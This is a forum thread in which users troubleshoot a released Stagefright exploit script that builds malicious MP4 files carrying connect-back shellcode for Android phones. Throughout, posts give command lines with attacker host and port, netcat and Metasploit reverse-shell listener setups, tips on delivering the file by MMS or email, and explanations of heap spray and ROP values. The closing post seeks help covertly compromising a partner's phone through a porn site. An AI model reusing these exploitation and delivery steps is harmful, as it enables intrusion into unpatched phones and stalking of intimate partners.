Forum Thread: Stagefright Exploit Released

I was able to run it by renaming the python script to mp4.py.

That worked for me too. Now just figuring out the options it produces. I'm sure someone here will have it figured out before me.

I was able to produce malicious mp4 files with your solution. You can use the -p and -c options to specify the address and port it should connect back to. Now I just need to figure out how to listen for the incoming connection. That should be the easy part, right? Anybody more experienced on this?

Try some of the Linux/android listeners in Metasploitable. I don't know if it uses these but it is worth the shot.

do "cd desktop"
without the quotes

and then python mp4.py

Downloaded it. Could someone explain how to use it?

see this. this video is not mine.

I would work on it if I had a pre Lollipop device. It says it doesn't work on 5.0

We all get the same error

Weird, I can't find anything on the 'mp4' module that seems necessary...

try this https://gist.github.com/AE5/d27b0fc6bdce232a0c4c

i guess that we need to setup a handler using linux/armle/shell_reverse_tcp...that's the payload used AFAIK after i opened the exploit.py with a text editor

yes, exploit only uses a buffer overflow but you need payload, find ARM reverse shell.

does it not open a connection back to the assigned host and port u've specified ?

exploit have a reverse shell http://i.imgur.com/KxkrUSU.png
but it proof-of-concept. i think the most interesting only buffer overflow.

how can do it. thank you.

This exploit code throws lots of errors on me, is there a specific python version I need to run it in?

What kind of errors are you getting?

TypeError: Can't convert 'bytes' object to str implicitly
When running C:\Python34>python.exe cve-2015-1538master\mp4.py -c 192.168.0.24 -p 222

Edit: got it working on a kali laptop I had laying around.

to the guru guys, will this work on non patched phones ofc:
#./mp4.py -c X -p X
sending it to my phone through gmail
#nc -l -p 20001
opening it from my phone

will it normally work ? cuz it doesnt, no connection back to my nc listener!!! help me out guys

I'm late for the solution, but here's some explanation:

>import mp4
>ImportError: No module named mp4

First thing to look for would be a module named 'mp4' for python, but if you read how it's used later in the script you will find out:

> # Build the MP4 file…
> data = mp4.createmp4(args.sprayaddr, args.roppivot, args.cbhost, args.cbport)

Look at the args and ask yourself if a createmp4 function could accept spray address, rop, and shellcode params. I'd say not.

So createmp4 is somehow a custom function defined somewhere, possibly elsewhere in another file…
But wait ! If you read ALL the code, you see there IS a function named createmp4 previously defined.
So why do I need to import mp4 ?

strip import mp4 line then....

This means I can directly call it within given script:

> # Build the MP4 file…
> data = createmp4(args.sprayaddr, args.roppivot, args.cbhost, args.cbport)

By renaming the script to mp4.py you are importing the script itself, and since the function is defined in the same file, it works, dirty way.

Now, to listen for a connection, you should run this on the attacker machine:
#nc -l -p 12345
just a simple generic listener over tcp port 12345 created with netcat.

192.168.1.1 looks like a router's address (unless you have some custom network settings). The -c flag needs the attacker machine's address, that would be more like 192.168.1.105. On that same machine, you should run

nc -l -p 444

This will make it listen for a connection (and not make a direct connection to the phone, as it's a connect back shellcode). Then you should run the mp4 on phone. If shellcode is executed properly, the android phone will start a connection to your pc, and since nectcat will accept the connection, you will be given a shell. Looks like the sprayed address is for hangouts. I don't have that installed, but I guess a better chance of success would be trying with that app.

The ip address was only an example, the c flag is being used correctly
I just dont know why it is failing, maybe if i try a different device

Hangoits was also updated to avoid stagefright BTW

The bug is not on hangouts, so no patch on it can solve the bug directly, at best, it mitigates its autopwning effect. Maybe it's just updated to avoid preloading of the video, so you have to manually click on it to trigger the exploit ? The real bug is deeper in the system, not just hangouts.

have you tried it with success?

I only have one 4.0.4 tablet right now, and mp4 generated only gets me a 'unable to play video' message. Previewing in gallery doesn't even crash it. Will try with more phones but they are all > 4.x so I'm not expecting a success without some modifications.

But does it lets you access it from a computer?

I still have to test it with reverse tcp handler. But the mp4 was created in a breeze, no error messages. Here is what I did. I just focused on creating the file first and now I have turned my focus on getting the shell. Will post here if something works. I guess Occupytheweb and F.E.A.R and other masters are already working on their new posts for doing what we all are trying to do. :)

System: Running Kali 2 on Live USB with persistence

Step 1: Update my kali instance
apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

Step 2: Saved the code as mp4.py in downloads

Step 3: Opened the terminal and typed
cd Downloads to open the folder
python mp4.py to execute the code

It lists the the help file with all the available options listed below:
'-c', '–connectback-host'
'-p', '–connectback-port'
'-s', '–spray-address'
'-r', '–rop-pivot'
'-o', '–output-file'

Step 4: entered the command
python mp4.py -c 192.168.0.2 -p 445 -o generatedFile.mp4

It creates a new mp4 file in the same folder (Downloads in this case)

By the way, anyone have any idea about what is a Spray address and a rop pivot ?

Hello,

After executing that mp4.py it create a new folder named " _pycache_" and inside that folder there is a file named "mp4.cpython-34" which is a pyc compiled python file and i get an error asking for optional arguments like cbhost, cbport, spray address, rop pivot and output file.

error:

Traceback (most recent call last):
File "C:\sf\mp4.py", line 389, in <module>
data = mp4.createmp4(args.sprayaddr, args.roppivot, args.cbhost, args.cbp
ort)
File "C:\sf\mp4.py", line 204, in createmp4
ftyp += struct.pack('>L', 0)
TypeError: Can't convert 'bytes' object to str implicitly

so how to execute that file to create the mp4 file?

Had the same error, try linux.

I have the same error, if you know the solution please share it

Me too.

i think without filled in SPRAYADRESS and ROPPIVOT variables there cannot be any success... Has anybody an idea for what they stand for? Maybe it varies from Device to Device?

is it normal to be having a 2Mo outcome? it isnt suited for MMS, the poc was at worst 170kb size and i dont think the payload did all the diff...

Yes, 2 MB is the normal file output. I think this is because this PoC exploits a heap overflow in Hangouts. If you see the mp4 generated, you will find multiple instances of the same data repeated over and over, just to fill the heap memory in order to overflow it. This is very specific for that application, and ROP are tailored instruction to bypass execution prevention on that android version. To make it work with other versions / applications you should first debug and see at what point the heap is overflowed, and modify the address.

Also, in build rop function, the third argument (newpc val) is passed but not used in the function.

Don't expect the whole exploit to work out of the box without some heavy modification. Besides, it would have been highly irresponsible to release a fully working exploit for a bug that less than 1% of android users are able to patch themselves. This means we have to dig more and more to get it to work...

SPRAYADRESS and ROPPIVOT maybe aren''t the problem because in the code these variables are filled... maybe these values are for test in other devices then nexus

Its Throwing up an error.

$ python mp4.py -c 192.168.0.15 -p 444 -o helloworld.mp4
Traceback (most recent call last):
File "mp4.py", line 389, in <module>
data = mp4.createmp4(args.sprayaddr, args.roppivot, args.cbhost, args.cbport)
File "--snip--/mp4.py", line 204, in createmp4
ftyp += struct.pack('>L', 0)
TypeError: Can't convert 'bytes' object to str implicitly

Thanks KAMAL D for the info, still not getting a reverse shell in LAN, can you please post a video or screenshots if you got it working? I mean the reverse shell part.

can someone put a perfect article on it, that how to correct the error etc and all step by step ?

I can't connect netcat it is no answer! how can apply netcat connect with android device ?

This exploit works only on nexus device with android 4.0.3, 4.0.4. Anybody have the generic code???

How to send mms from computer ?

You have to send the mms from a phone :)

has anybody got this working correctly yet and would like to share the step by step procedure? :)

Can someone please explain to me how to execute the stage fright hack onto my bf's android? I'm not computer literate per sa, so step by step please. I'm using my android phone to do this.

He does visit xnxx.com alot. I was thinking of getting it to his phone through that site.
Much appreciated